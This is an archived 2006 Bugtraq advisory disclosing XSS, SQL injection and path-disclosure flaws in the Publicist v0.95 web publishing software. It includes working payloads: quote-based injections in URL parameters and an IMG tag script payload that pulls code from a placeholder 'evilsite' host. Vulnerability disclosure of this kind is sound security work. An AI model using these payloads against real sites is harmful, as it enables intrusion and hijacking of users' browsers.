[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Publicist v0.95 - XSS And Full Path Errors

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Publicist v0.95 - XSS And Full Path Errors
From: luny@xxxxxxxxxxxxxxx
Date: 23 May 2006 08:01:10 -0000

Publicist v0.95 

Homepage:
http://publicist.kau.se/ 

Description:
Publicist is a free web server software, created for web papers, that allows 
groups of people to write and publish together on the web (i.e. schools or 
single classes, clubs, or other groups who wish to express themselves). 

-------------------------------------- 

Exploits & Vulnerabilities: 

Full path and SQL Query errors: 

Type the following in login box: [BODY ONLOAD=alert('XSS')]
and it produces: 

1064: You have an error in your SQL syntax near 'XSS')>'' at line 1 Warning: 
mysql_fetch_array(): supplied argument is not a valid MySQL result resource in 
/var/www/html.example. com/left.php on line 63 

SQL injection on return variable: 
http://www.example.com/info.php?id=1147443203&return_=3' 

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result 
resource in /var/www/html.publicist. kau.se/count.php on line 6 Unable to 
process query: You have an error in your SQL syntax near 
''/info.php?id=1147443203&return_=3'', count=1' at line 1 

SQL Injection on visa variable: 
http://www.example.com/hitlist_editorial_public_info.php?visa=dan.akerlund' 

Warning: mysql_numrows(): supplied argument is not a valid MySQL result 
resource in /var/www/examplesite.com/ hitlist_editorial_public_info.php on line 
73 

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result 
resource in /var/www/examplesite.com /hitlist_editorial_public_info.php on line 
74 



Submiting html tags in the comment boxes produces this SQL queue error: 

1064: You have an error in your SQL syntax near 'evilcode'))>', c_show = '1', 
c_time = '1' at line 7 



XSS Vulnerability: 

An XSS attack is possible by entering in the comment box some html code like 
this: 

[IMG SRC=javascript:window.location('http://www.evilsite.com/evilcode.js')] 

It should also be noted that calling the files c_getMsg.php, c_getUser.php, 
count.php, display full path errors and contain mysql connect info: 

Example of the above errors: 

Warning: mysql_connect(): Access denied for user: 'example@localhost' (Using 
password: YES) in /var/www/html.example.com/c_getUser.php on line 2

Prev by Date: Re: Checkpoint SYN DoS Vulnerability
Next by Date: Re: Circumventing quarantine control in Windows 2003 and ISA 2004
Previous by thread: AlstraSoft Web Host Directory v1.2
Next by thread: Mambo <= 4.6. RC1 xss
Index(es):
- Date
- Thread